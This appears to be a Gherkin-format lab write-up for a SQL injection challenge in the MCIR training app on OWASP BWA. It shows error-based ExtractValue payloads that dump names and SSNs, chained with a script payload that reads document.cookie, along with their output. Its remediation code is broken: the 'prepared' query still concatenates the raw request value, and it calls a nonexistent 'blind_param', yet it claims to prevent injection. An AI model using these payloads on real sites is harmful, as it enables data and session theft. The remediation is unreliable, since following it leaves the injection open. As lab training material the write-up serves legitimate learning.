## Version 1.4.1
## language: en

Feature:
  TOE:
    MCIR
  Category:
    sql injection
  Location:
    http://192.168.1.150/MCIR/sqlol/challenges/challenge12.php - user(field)
  CWE:
    CWE-0089: Improper Neutralization of Special Elements used in an SQL Command
  Rule:
    REQ.191: Protect data with maximum level
  Goal:
    Use an SQL injection flaw to execute a reflected cross-site scripting attack
  Recommendation:
    Validate and sanitise user input and use parameterized queries

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali-rolling    | 2019.1      |
    | Mozilla Firefox | 64.4.0      |
  TOE information:
    Given I am running owasp bwa in VM virtualBox
    And I access to the next url
    """
    http://MCIR/
    """
    And I can see all the vulnerabilities of the app

  Scenario: Normal use case
  Show
    Given I access to the section sqlol
    """
    http://MCIR/sqlol/select.php
    """
    And I can see the injection parameters configuration
    And I got to the following link
    """
    http://192.168.1.150/MCIR/sqlol/challenges/challenge12.php
    """
    And I see the following text
    """
    The contents of the database are usually considered to be trusted.
    Some mass attackers have taken advantage of this fact and launched
    mass SQL injection attacks which not only steal the contents of the
    database but which also place <script> tags pointing to malicious
    Javascript in all rows of the database in the hopes that they will
    be presented to users of the site.

    Your objective is to use an SQL injection flaw to execute
    a reflected cross-site scripting attack.
    """

  Scenario: Static detection
  Doesn't validate characters and doesn't use parameterized queries
    When I look at the code in the following link
    """
    https://github.com/SpiderLabs/MCIR/blob/master/sqlol/select.php
    """
    Then I can see following lines of code
    """
    75 $where_clause = 'WHERE isadmin = ' . $_REQUEST['inject_string'];
    """
    Then I can conclude that the characters entered by user doesn't sanitise
    And I see the following lines
    """
    24 $db_conn->SetFetchMode(ADODB_FETCH_ASSOC);
    25 $results = $db_conn->Execute($query);
    """
    And I can see that doesn't use parameterized queries
    Then I conclude that the application is vulnerable  to injection sql


  Scenario: Dynamic detection
  Show a fail message in the application
    Given I can to insert parameters in the text field
    Then I wrote a quote in the text field
    Then I get the output:
    """
    You have an error in your SQL syntax; check the manual that
    corresponds to your MySQL server version for the right
    syntax to use near ''' at line 1
    """
    Then I can conclude that the data is not validate

  Scenario: exploitation
  Get information from users and insert code Javascript
    Given The application is vuln to xss and sql injection
    Then I insert a window alert to verify it
    """
    ''#<script> alert() </script>
    """
    And I can see the window alert
    Then I can insert code javascript
    And The application only show one row from results
    Then I use the following query to get information from ssn table
    """
    ' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn)
    from ssn limit 1 offset 0)))='a
    """
    Then I get the information from the ssn table
    And I try insert code javascript to get the information from the cookie
    And I use the following query
    """
    ' AND ExtractValue('junk',concat(0x01,(select concat(name,':',ssn)
    from ssn limit 1 offset 0)))='a #<script> alert(document.cookie) </script>
    """
    Then I can see the results from the query
    """
    XPATH syntax error: 'Herp Derper:012-34-5678'
    """
    And I can see results from the xss attack
    """
    acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
    """

  Scenario: Remediation
  Using parameterized queries
    Given I am running MCIR in OWASP BWA
    And I detect that application doesn't use parameterized queries
    Then The vulnerabilitie can be patched using PDO
    """
    75 $where_clause = $pdo->prepare('WHERE isadmin = '
    . $_REQUEST['inject_string']);
    """
    And I can use the same tecnique in the following lines
    """
    25 $results->blind_param('q',$query);
    26 $db_conn->execute($query);
    """
    Then Using this methods we can be prevent a sql injection

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.0/10 (Medium) - AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    5.5/10 (Medium) - E:F/RL:W/RC:R/
  Environmental: Unique and relevant attributes to a specific user environment
    6.0/10 (Medium) - CR:L/IR:H/AR:H

  Scenario: Correlations
    No correlations have been found to this date 2019-03-27
